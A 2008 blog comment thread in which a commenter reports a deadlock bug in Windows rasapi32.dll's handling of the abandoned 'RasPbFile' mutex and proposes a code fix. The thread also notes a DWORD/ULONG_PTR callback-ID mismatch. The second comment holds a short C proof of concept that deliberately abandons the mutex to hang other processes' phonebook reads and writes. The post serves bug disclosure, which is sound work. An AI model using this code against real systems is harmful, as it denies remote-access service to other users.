re: Securing the server running RRAS role after doing upgrade or fresh install of Windows server 2008

yuguang — Fri, 11 Apr 2008 06:30:01 GMT

Maybe this post should not post in here, but I don't know how to indicate it to correct people.

Bug in rasapi32.dll

In dllmain@rasapi32.dll (DLL_PROCESS_ATTACH), it opens a global mutex which names "RasPbFile" and closes it in dllmain(DLL_PROCESS_DETACH).

The dll use the mutex to sync the read/write operations of the phone book file. In function ReadPhonebookFileEx and WritePhonebookFile.

In both these two functions, the code look like:

if(WaitforSingleObject(g_hmutexPb,INFINITE)==0)

{

Read/Write Phone book file;

ReleaseMutex(hmutexPb);

return;

}

else

{

return;

}

But it's wrong, in MSDN, I found the following description:

If a thread terminates without releasing its ownership of a mutex object, the mutex object is considered to be abandoned. A waiting thread can acquire ownership of an abandoned mutex object, but the wait function will return WAIT_ABANDONED to indicate that the mutex object is abandoned.

So if one application use rasapi32.dll and terminated for some reason, the mutex maybe abandoned, which would cause the following Read/WritePhonebookFile (in another process) acquire the mutex, and DONOT release. So deadlock...

The correct code maybe:

DWORD WaitRet = WaitforSingleObject(g_hmutexPb,INFINITE);

if(WaitRet==0 || WaitRet == WAIT_ABANDONED)

{

Read/Write Phone book file;

ReleaseMutex(hmutexPb);

return;

}

else

{

return;

}

I don't know if the bug exist in all windows platform. I only check it in windows 2k8 x64 enterprise edition. But I think it should exist in all windows platform.

Another question is, from MSDN, the stuct RASDIAL_PARAMS

defines as following:

typedef struct _RASDIALPARAMS {

DWORD dwSize;

TCHAR szEntryName[RAS_MaxEntryName + 1];

TCHAR szPhoneNumber[RAS_MaxPhoneNumber + 1];

TCHAR szCallbackNumber[RAS_MaxCallbackNumber + 1];

TCHAR szUserName[UNLEN + 1];

TCHAR szPassword[PWLEN + 1];

TCHAR szDomain[DNLEN + 1] ;

#if (WINVER >= 0x401)

DWORD dwSubEntry;

ULONG_PTR dwCallbackId;

#endif

} RASDIALPARAMS;

the dwCallbackId is ULONG_PTR which means in x64 platform, it's uint64.

but in RasDialFunc2:

DWORD CALLBACK RasDialFunc2(

[in] DWORD dwCallbackId,

[in] DWORD dwSubEntry,

[in] HRASCONN hrasconn,

[in] UINT unMsg,

[in] RASCONNSTATE rascs,

[in] DWORD dwError,

[in] DWORD dwExtendedError

);

the dwCallbaackId is DWORD which means it's always uint32.

Why?

re: Securing the server running RRAS role after doing upgrade or fresh install of Windows server 2008

yuguang — Fri, 11 Apr 2008 07:58:13 GMT

The attack code looks like:

#include "stdafx.h"

#include "windows.h"

HANDLE gMutex = NULL;

DWORD WINAPI Worker(void*)

{

// deadlock

DWORD Wait = WaitForSingleObject(gMutex,INFINITE);

return Wait;

}

int _tmain(int argc, _TCHAR* argv[])

{

gMutex = OpenMutex(SYNCHRONIZE,FALSE,"RasPbFile");

if(argc == 2 && stricmp(argv[1],"ABANDONED")==0)

{

DWORD Wait = WaitForSingleObject(gMutex,INFINITE);

CloseHandle(gMutex);

exit(0); // mutex to be ABANDONED state

}

DWORD Wait = WaitForSingleObject(gMutex,INFINITE);

if(Wait == 0) ReleaseMutex(gMutex); // if Mutex state is ABANDONED, the Wait must be WAIT_ABANDONED so that skip the ReleaseMutex

HANDLE Thread = CreateThread(NULL,0,Worker,NULL,0,NULL);

DWORD Wait2 = WaitForSingleObject(Thread,INFINITE);

CloseHandle(gMutex);

return 0;

}

How to secure the server running RRAS role after doing upgrade or fresh install of Windows server 2008

re: Securing the server running RRAS role after doing upgrade or fresh install of Windows server 2008

re: Securing the server running RRAS role after doing upgrade or fresh install of Windows server 2008